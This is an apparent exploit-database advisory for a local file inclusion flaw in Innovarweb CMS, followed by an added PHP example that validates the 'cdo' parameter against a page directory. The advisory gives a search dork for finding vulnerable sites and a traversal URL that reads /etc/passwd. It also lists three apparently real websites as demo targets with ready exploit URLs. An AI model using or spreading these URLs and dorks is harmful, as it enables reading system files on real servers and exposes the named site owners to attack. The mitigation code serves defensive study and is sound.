Innovarweb CMS suffers from a local file inclusion vulnerability.
2b26b51cb0e5d67ff32ec221d94770eb225cc7e960d1829cbf4a695c34eede2c
# Exploit Title: Innovarweb CMS / Local File Inclusion
# Date: 31/08/2012
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar
# Software web: http://www.innovarweb.com.ar/interior/index.php?cdo=servicios/gestor_contenidos.php
# Tested on: Linux
# Dork: allinurl:"index.php?cdo="
[Comment]
Greetz: Hernan Jais, Alfonso Cuevas, SPEED, hacklego, Incid3nt, Maximiliano Soler, Pablin77, _tty0, Login-Root, Knet, Kikito, Duraznit0, InyeXion, ksha, zerial, LinuxFer, Scorp her0, r0dr1 and the other users of RemoteExecution
www.remoteexecution.info www.remoteexcution.com.ar
#RemoteExecution Hacking Group
[PoC]
http://target/index.php?cdo=../../../../.././etc/passwd
[DEMO]
http://www.westingcapitalinc.com/index.php?cdo=./../../../../../etc/passwd
http://www.areneracolonia.com.ar/interior/index.php?cdo=../../../../../../etc/passwd
http://www.suspensioncarlitos.com.ar/index.php?cdo=../../../../../../etc/passwd
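[Mitigation example]
The PoC above is consistent with the `cdo` value reaching a PHP include unchecked; that is an assumption, since the CMS source is not shown here. The following is an added example, not Innovarweb's code, of resolving `cdo` against a fixed page directory before including it. `PAGES_DIR`, `resolve_page()` and the default page `inicio.php` are hypothetical names.

```php
<?php
// Added example, not the CMS's own code. PAGES_DIR, resolve_page() and
// the default page name are hypothetical.
declare(strict_types=1);

const PAGES_DIR = __DIR__ . '/pages';   // assumed directory of includable pages

/**
 * Map a user-supplied "cdo" value to a file inside PAGES_DIR.
 * Returns the canonical path, or null if the value must be rejected.
 */
function resolve_page(string $cdo): ?string
{
    // Reject empty values and NUL bytes outright.
    if ($cdo === '' || strpos($cdo, "\0") !== false) {
        return null;
    }
    // Allow only names like "servicios/gestor_contenidos.php":
    // no dots inside segments, so "../" and "./" can never match.
    if (!preg_match('#^[A-Za-z0-9_\-]+(/[A-Za-z0-9_\-]+)*\.php$#', $cdo)) {
        return null;
    }
    $base = realpath(PAGES_DIR);
    if ($base === false) {
        return null;
    }
    // realpath() resolves symlinks and any remaining relative parts.
    $path = realpath($base . DIRECTORY_SEPARATOR . $cdo);
    if ($path === false) {
        return null;
    }
    // Containment check: the canonical path must stay under PAGES_DIR.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return is_file($path) ? $path : null;
}

$raw  = $_GET['cdo'] ?? 'inicio.php';           // hypothetical default page
$page = is_string($raw) ? resolve_page($raw) : null;
if ($page === null) {
    http_response_code(404);
    exit('Not found');
}
require $page;
```

With this check, the legitimate value `servicios/gestor_contenidos.php` resolves only if that file exists under the page directory, and the traversal strings in the PoC are rejected by the pattern match before any filesystem call.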